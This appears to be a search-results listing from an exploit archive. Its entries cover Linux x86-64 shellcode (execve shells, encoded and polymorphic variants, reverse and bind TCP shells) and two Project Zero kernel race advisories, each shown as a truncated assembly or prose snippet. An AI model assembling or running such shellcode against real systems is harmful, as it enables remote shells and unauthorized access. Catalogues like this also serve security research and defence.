1131 matches found
Linux/x86-64 - XOR Encode execve Shellcode
/ Title : Linux x8664 XOR encode execve"/bin//sh","//bin/sh","-i",NULL,NULL shellcode Date : 31-05-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 / / main code ------------------------ section .text global start start: xor rax,rax xor rdx,rdx push rax push rax mov...
Linux x86_64 XOR Encode execve Shellcode
Linux x8664 XOR Encode execve Shellcode. Shellcode exploit for linx86-64 platform / Title : Linux x8664 XOR encode execve"/bin//sh","//bin/sh","-i",NULL,NULL shellcode Date : 31-05-2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 / / main code ------------------------...
Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)
/ Exploit Title: Shellcode Linux x8664 Reverse Shell Date: 19/03/2016 Shellcode Author: Sudhanshu Chauhan LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan Tested on: Ubuntu 14.04.1 x8664 global start start: ;Socket xor rax, rax xor rdi, rdi xor rsi, rsi xor rdx, rdx add rax, 41 add rdi, 2 ad...
Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)
/ Title : Linux x8664 bind tcp : port 1472 ipv6 Date : 02/05/2016 Author : Roziul Hasan Khan Shifat Tested On : Ubuntu 14.04 LTS x8664 Contact : email protected / / section .text global start start: ;;socket xor rax,rax push 6 push 0x1 push 10 pop rdi pop rsi pop rdx mov al,41 ;socket syscall...
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=807 A race condition in perfeventopen allows local attackers to leak sensitive data from setuid programs. perfeventopen associates with a task as follows: SYSCALLDEFINE5perfeventopen, struct perfeventattr user , attruptr, pidt, pid...
Linux/x86_x64 - execve/bin/bash - 33 bytes
Linux/x86x64 - execve/bin/bash - 33 bytes. Shellcode exploit for linx86-64 platform / --------------------------------------------------------------------------------------------------- Linux/x86x64 - execve/bin/bash - 33 bytes Ajith Kp @ajithkp560 http://www.terminalcoders.blogspot.com Om Asato...
Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)
/ --------------------------------------------------------------------------------------------------- Linux/x86x64 - execve/bin/sh - 25 bytes Ajith Kp @ajithkp560 http://www.terminalcoders.blogspot.com Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih...
Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)
/ --------------------------------------------------------------------------------------------------- Linux/x86x64 - execve/bin/bash - 33 bytes Ajith Kp @ajithkp560 http://www.terminalcoders.blogspot.com Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih...
Linux/x86_x64 - execve/bin/sh - 25 bytes
Linux/x86x64 - execve/bin/sh - 25 bytes. Shellcode exploit for linx86-64 platform / --------------------------------------------------------------------------------------------------- Linux/x86x64 - execve/bin/sh - 25 bytes Ajith Kp @ajithkp560 http://www.terminalcoders.blogspot.com Om Asato Maa...
Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)
/ --------------------------------------------------------------------------------------------------- Linux/x86x64 - execve/bin/sh - 26 bytes Ajith Kp @ajithkp560 http://www.terminalcoders.blogspot.com Om Asato Maa Sad-Gamaya | Tamaso Maa Jyotir-Gamaya | Mrtyor-Maa Amrtam Gamaya | Om Shaantih...
Linux/x86_x64 - execve/bin/sh - 26 bytes
Linux/x86x64 - execve/bin/sh - 26 bytes. Shellcode exploit for linx86-64 platform / --------------------------------------------------------------------------------------------------- Linux/x86x64 - execve/bin/sh - 26 bytes Ajith Kp @ajithkp560 http://www.terminalcoders.blogspot.com Om Asato Maa...
Apple Mac OSX iOS - SUID Binary Logic Error Kernel Code Execution
Apple Mac OSX iOS - SUID Binary Logic Error Kernel Code Execution Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=676 tl;dr The code responsible for loading a suid-binary following a call to the execve syscall invalidates the task port after first swapping the new vmmap into the...
Race you to the kernel!
Posted by Ian Beer of Google Project Zero The OS X and iOS kernel code responsible for loading a setuid root binary invalidates the old task port after first swapping the new virtual memory map pointer into the old task object, leaving a short race window where you can manipulate the memory of an...
Linux/x86-64 - Reverse Shell Shellcode
/ Exploit Title: Shellcode Linux x8664 Reverse Shell Date: 19/03/2016 Shellcode Author: Sudhanshu Chauhan LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan Tested on: Ubuntu 14.04.1 x8664 global start start: ;Socket xor rax, rax xor rdi, rdi xor rsi, rsi xor rdx, rdx add rax, 41 add rdi, 2 ad...
Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)
/--------------------------------------------------------------------------------------------------------------------- / Title: tcp reverse shell with password polymorphic version v2 135 bytes Author: Sathish kumar Contact: https://www.linkedin.com/in/sathish94 Copyright: c 2016 iQube...
x86_64 Linux Polymorphic Execve-Stack - 47 bytes
x8664 Linux Polymorphic Execve-Stack - 47 bytes. Shellcode exploit for linx86-64 platform /--------------------------------------------------------------------------------------------------------------------- / Title: x8664 linux Polymorphic execve-stack 47 bytes Author: Sathish kumar Contact:...
Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)
/--------------------------------------------------------------------------------------------------------------------- / Title: x8664 linux Polymorphic execve-stack 47 bytes Author: Sathish kumar Contact: https://www.linkedin.com/in/sathish94 Copyright: c 2016 iQube. http://iQube.io Release Date:...
Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)
/--------------------------------------------------------------------------------------------------------------------- / Title: tcp reverse shell with password polymorphic version 122 bytes Author: Sathish kumar Contact: https://www.linkedin.com/in/sathish94 Copyright: c 2016 iQube. http://iQube....
x86_64 Linux xor/not/div Encoded execve Shellcode
x8664 Linux xor/not/div Encoded execve Shellcode. Shellcode exploit for linx86-64 platform /--------------------------------------------------------------------------------------------------------------------- / Title: x8664 linux-Xor/not/div encoded execve shellcode Author: Sathish kumar Contact...
Linux/x86 - execve "/bin/sh" Shellcode (24 bytes)
/ ; Title: Linux/x86 execve "/bin/sh" - shellcode 24 byte ; Platform: linux/x86 ; Date: 2015-01-03 ; Author: Dennis 'dhn' Herrmann ; Website: https://zer0-day.pw BITS 32 global start section .text ; syscalls kernel SYSEXECVE equ 0x0b start: ; execve"/bin//sh", 0, 0; push SYSEXECVE ; SYSEXECVE = 1...